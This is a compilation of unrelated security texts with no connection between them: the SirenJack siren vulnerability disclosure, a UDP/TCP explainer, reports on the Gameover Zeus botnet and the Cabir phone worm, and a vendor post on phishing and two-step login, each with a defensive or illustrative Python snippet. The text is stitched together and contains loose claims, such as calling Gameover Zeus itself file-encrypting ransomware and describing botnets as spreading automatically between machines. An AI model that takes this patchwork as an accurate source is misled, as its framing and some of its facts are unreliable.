Balint Seeber, a researcher with Bastille, began researching San Francisco's warning siren system shortly after moving to the city in 2016. Noticing poles with sirens attached scattered throughout the city, and noting that the hardware for the sirens included radio antennae, Seeber was curious about the system's security. After realizing that there was a system test every Tuesday, Seeber first began looking for the system's radio frequency. "I started every week, capturing and analyzing large chunks of the radio spectrum with a view to trying to find this one unknown signal amongst hundreds, maybe thousands, of signals across the spectrum and that took some time," he says.

Seeber was surprised to find that the frequency used by the system is not one normally associated with public service or public infrastructure control. It is, instead, one that is close to those used by radio amateurs. "I've demonstrated that even a $30 to $35 handheld radio you can buy from Amazon that is used by radio hobbyists — like a more enhanced walkie-talkie — is perfectly capable of perpetrating an attack when combined with a laptop," he says.

Once the frequency was known, he began looking at the transmission itself, and he soon found that the control signals were being sent with no encryption at all. That meant that anyone willing to put in the sort of effort he had made could analyze and hijack control of the system. Seeber then traveled to Sedgwick County, Kansas, where a similar system was in use, to see if the vulnerability also existed there. "The findings were consistent there and I did see the same pattern. And so I was able to confirm that their system was also vulnerable," he says.

While each system is customized to a great extent, Seeber says that an attacker could use knowledge of the protocol to turn pre-programmed alerts on or off. In addition, he says that the system has a direct public-address mode, so it is possible that an attacker could use the infrastructure to broadcast an illicit message to the public over these speakers.

At that point, Seeber and Bastille notified ATI, the system's vendor, of the SirenJack vulnerability. Seeber is eager to point out that the notification was in line with ethical analyst behavior. "We conducted this process with responsible disclosure," he says, adding, "That means that we write our findings up and disclose it privately to the vendor, which we did in early January. Then we provide 90 days during which they're able to take those findings and prepare any remediation steps." In a statement, ATI's CEO, Dr. Ray Bassiouni, said, "ATI is fully supportive of all of our clients and will be on standby if anyone is concerned about hacking or vulnerabilities in their system."
Seeber says that while Bastille was not asked to test the patch ATI provided to San Francisco, he has seen work on the pole-based components and has noticed random traffic within the signals, traffic that indicates at least some level of encryption is now in place. "We don't want the public to lose confidence in the system and the government's ability to handle emergencies," Seeber says. He encourages more government agencies to test their emergency notification systems to avoid surprises in the future.
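The root cause SirenJack exposed is that activation commands traveled over the air with no encryption or authentication, so anyone who located the frequency could forge or replay them. ATI's actual protocol and patch have not been published, so the Python sketch below is only a generic illustration of the class of fix involved: authenticating each command frame with an HMAC over a shared key and rejecting stale counters to block replays. The key, frame layout, and command IDs here are invented for the example.

```python
import hmac
import hashlib
import struct
import time

# Hypothetical shared key provisioned to the activation console and each
# siren controller; real key management for such systems is not public.
SHARED_KEY = b"example-demo-key-do-not-use-in-prod"

def pack_command(command_id: int, counter: int) -> bytes:
    """Build an authenticated frame: command id, counter, timestamp, HMAC tag."""
    body = struct.pack(">HIQ", command_id, counter, int(time.time()))
    tag = hmac.new(SHARED_KEY, body, hashlib.sha256).digest()
    return body + tag

def verify_command(frame: bytes, last_counter: int) -> bool:
    """Reject frames with a bad tag (forgery) or a stale counter (replay)."""
    body, tag = frame[:-32], frame[-32:]
    expected = hmac.new(SHARED_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return False
    _, counter, _ = struct.unpack(">HIQ", body)
    return counter > last_counter

frame = pack_command(command_id=7, counter=42)
print(verify_command(frame, last_counter=41))   # True: fresh, authentic frame
print(verify_command(frame, last_counter=42))   # False: replayed frame
```

Without a shared secret in the loop, the $30 hobbyist radio Seeber describes is all an attacker needs; with one, captured frames can still be recorded but can no longer be forged or usefully replayed.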
User Datagram Protocol (UDP) is an alternative communications protocol to Transmission Control Protocol (TCP), used primarily for establishing low-latency, loss-tolerating connections between applications over the internet. UDP is also known as a "stateless" protocol, meaning it does not acknowledge that the packets being sent have been received. Because UDP works this way, it is typically used for streaming services: you may hear some break-up in the audio or see some skips in the video, but UDP keeps the stream moving rather than stalling to wait for lost packets to be retransmitted.

Transmission Control Protocol (TCP) is a standard that defines how to establish and maintain a network conversation through which programs can exchange information. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. TCP is widely used for its reliability, ordered delivery, and error checking, and it is the choice for email, file transfers, and any other operation where error-free data matters more than raw speed.
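To make the difference concrete, here is a minimal sketch using Python's standard socket module; the loopback address, port numbers, and payloads are arbitrary choices for the demo. The UDP side sends a datagram with no handshake and no acknowledgment, while the TCP side establishes a connection first and retransmits until the data is acknowledged.

```python
import socket

HOST, PORT = "127.0.0.1", 9999   # arbitrary local address for the demo

# --- UDP: connectionless, no delivery guarantee ---------------------------
udp_rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_rx.bind((HOST, PORT))

udp_tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_tx.sendto(b"video frame 1", (HOST, PORT))   # fire-and-forget

data, addr = udp_rx.recvfrom(2048)              # each datagram arrives whole, or not at all
print("UDP received", data, "from", addr)

# --- TCP: connection-oriented, reliable, ordered --------------------------
tcp_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_srv.bind((HOST, PORT + 1))
tcp_srv.listen(1)

tcp_cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_cli.connect((HOST, PORT + 1))               # three-way handshake
conn, _ = tcp_srv.accept()

tcp_cli.sendall(b"email attachment chunk")      # kernel retransmits until acknowledged
print("TCP received", conn.recv(2048))

for s in (udp_rx, udp_tx, tcp_cli, conn, tcp_srv):
    s.close()
```

A streaming service built on UDP simply tolerates the occasional lost datagram (the audio break-up or video skip mentioned above), whereas email or file transfer over TCP waits for every byte to arrive intact and in order.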
At the start of June this year, the takedown of the sophisticated malware known as "Gameover", "Gameover Zeus", or "GOZ" appeared to be complete. The botnet had infected millions of machines with malware that encrypts the files on a system and demands a ransom to decrypt them, and the team behind it earned more than $100 million by encrypting innocent users' files and charging for their recovery. But according to reports from various sources online, the malware has been seen again. SophosLabs has shared an example of what the spam email looks like; it carries code similar to the Gameover botnet and is infecting users through a new type of spam email campaign.

What is a botnet?
A botnet is considered more effective than many other attack techniques because, once installed, it works automatically and does not need the attacker to be present or to authenticate each time. Infected machines behave like zombies: one compromised system infects another, that one infects the next, and the chain continues until it really is game over.

What can a botnet do for hackers?
If a bot is installed on your system, it will try to infect other computers on your network, or systems you interact with online through chat, email, or other services. Hackers can send commands to all infected computers at once and make them do whatever they want: launch a DDoS attack, click on ads to generate revenue for the operators, or, of course, encrypt your entire system. Attacks launched from botnet-infected computers are hard to stop, because the affected users do not know about the malicious activity running from their machines.

Gameover has scrambled most of its text messages (strings, in programming parlance) using a custom algorithm that has been the same since the source code of the original Zeus was leaked in 2011, Sophos writes. That algorithm and the string table are still present in the new version, and the decrypted strings are the same as those in earlier Gameover variants, it added. A complete report on the resurrected Gameover malware is published on the Sophos blog.

One thing you must do to secure your systems: always keep an antivirus program running, and stay safe and connected to us :)
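Sophos's point about the string-scrambling routine matters to analysts: because the routine has not changed since the 2011 Zeus source leak, the same decoder recovers the strings in new samples. The snippet below is not the real Zeus/Gameover algorithm (which is not described here); it is a toy repeating-key XOR example, with a made-up key and URL, showing why encoded strings look like noise in a raw dump of the binary yet decode trivially once the fixed routine is known.

```python
# Toy illustration only: a repeating-key XOR scrambler, NOT the actual
# Zeus/Gameover string algorithm. The key and URL below are invented.
KEY = b"\x5a\x13\xc7"

def scramble(text: str) -> bytes:
    data = text.encode("utf-8")
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))

def unscramble(blob: bytes) -> str:
    # XOR with the same repeating key reverses the transformation exactly.
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(blob)).decode("utf-8")

encoded = scramble("http://command-server.invalid/gate.php")
print(encoded)               # opaque bytes in a strings dump of the binary
print(unscramble(encoded))   # recovered instantly with the known routine
```

Because every variant reuses the same routine and string table, a decoder written against a 2011 sample still works on newer ones, which is in line with Sophos's observation that the decrypted strings match earlier Gameover variants.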
The Cabir mobile phone virus has been spotted on a Nokia handset for sale in a shop in California, reported Finnish anti-virus research company F-Secure. Cabir is a worm that runs on Symbian OS handsets and replicates itself over Bluetooth connections. Infected phones display the message 'Caribe' when turned on, and the worm then looks for other Bluetooth-enabled handsets nearby through which it can spread. Its payload causes phone batteries to drain. Since it was created in the Philippines in August 2004, Cabir has "mutated" into 15 variants and spread to 12 countries via travelers' infected handsets. Rapidly developing technology makes cell phone viruses a fast-growing threat, IBM warned in recent research. It is now becoming essential for all Symbian users to get anti-virus protection for their mobile devices, and the sooner the better.
Protecting Your Users from Phishers
This post is the first in a series on how to protect your users from common online security threats. Phishing is the act of tricking a user into providing sensitive information (username and password, social security number, confidential files, etc.). Hackers recently used phishing attacks (among other techniques) to steal vast quantities of credit card information from Home Depot and Target, while the Anti-Phishing Working Group detected over 250,000 phishing sites in Q1 and Q2 2014 alone.
A classic phishing attack might go something like this:
- A hacker sends a user an email purporting to be from your company's IT department.
- The email indicates that a security breach has occurred and provides a link where the user can reset his or her password.
- The user enters his or her account credentials in a web form made to resemble a page in your corporate intranet.
- The hacker uses these credentials to access your system.
Phishing schemes have become very sophisticated; hackers will go to great lengths to create emails and websites that are nearly exact replicas of your company's emails and website. Often, the only distinguishing tells are bogus URLs. Social media has made the phisher's job easier by allowing the collection of personal information, which can be included in phishing communication to build trust. For example, a San Francisco-based employee who posts a series of pictures of Seattle on Instagram could be targeted with a message that includes a line about "your recent conference in Seattle." Social media also makes it easier to identify targets who might have access to sensitive data.
The best way to avoid a phishing attack is to train your employees to be suspicious of any official-looking communication that prompts them to enter sensitive information, like account credentials. Blurry corporate logos, misspelled words, and oddly phrased language are all clues that an email or website is a phishing artifice. In particular, users should pay close attention to hyperlinks in seemingly official emails. Common signs of a sketchy URL include misspelled words and URLs that do not begin with "https://".
Contacting the authority that requested the sensitive information is a good practice, but it is not foolproof. Phishers are often savvy social engineers who are adept at manipulating the trust of your users. They have been known to field calls from the numbers on their fake websites and persuade their victims to divulge information over the phone.
Two-Step Login Verification (also known as Two-Factor or Multi-Factor Authentication) is the best technical tool to defeat phishers. TSLV requires users to enter a third piece of information (in addition to username and password) to access their accounts. For example, a user might enter a username and password, and then be prompted to enter a one-time code sent to his or her mobile phone as a text. The idea is that even if hackers phish the user's username and password, they are unlikely to also have gained control of the user's mobile phone.
Egnyte has partnered with Duo Security to offer a robust Two-Step Login Verification system, which you can make mandatory for your account users. This feature is included in our Advanced Security Package. Interested in learning more? Here are some additional details on advanced authentication.
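One-time codes like the ones described above are commonly generated with the TOTP algorithm (RFC 6238) when an authenticator app is used instead of SMS; vendors such as Duo also support SMS and push methods. The sketch below is not Egnyte's or Duo's implementation, just a standard-library Python illustration of the idea: the server and the user's device derive the same six-digit code from a shared secret and the current time, so a phished password alone is not enough to log in. The secret value is a made-up example.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Time-based one-time password (RFC 6238) using HMAC-SHA1."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval          # 30-second time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

SECRET = "JBSWY3DPEHPK3PXP"   # hypothetical per-user enrollment secret

submitted = totp(SECRET)                   # what the user's device shows right now
print("Server expects:", totp(SECRET))
print("Login allowed: ", hmac.compare_digest(submitted, totp(SECRET)))
```

Even if a phisher captures the username, password, and one displayed code, the code expires at the end of its short time window and cannot be reused for a later session, which is what makes this control so effective against the attacks described above.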